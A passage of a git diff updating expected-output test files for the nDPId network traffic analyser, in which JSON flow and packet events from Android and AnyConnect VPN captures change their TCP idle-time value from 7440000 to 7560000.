00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} diff --git a/test/results/anyconnect-vpn.pcap.out b/test/results/anyconnect-vpn.pcap.out index cd1c81cc2..f9160e1d0 100644 --- a/test/results/anyconnect-vpn.pcap.out +++ b/test/results/anyconnect-vpn.pcap.out @@ -1,16 +1,16 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569687240992} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"} 